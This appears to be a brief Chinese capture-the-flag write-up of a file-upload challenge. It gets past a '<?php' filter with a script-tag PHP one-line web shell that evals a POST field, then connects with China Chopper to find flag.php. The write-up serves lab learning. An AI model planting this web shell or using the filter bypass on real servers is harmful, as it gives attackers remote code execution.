一、进入目标站点,查看网页源码。 二、没有上传限制,那我们就直接上传一个一句话木马的php文件看看。可以看到文件路径,和php内容,但是该内容明显少了一些,应该是被过滤了。 三、在多次尝试修改<?php项后均无果,换使用<script language="Php"> @eval($_POST['SDM'])</script>。 四、使用中国菜刀连接。 五、连接成功,找到flag.php。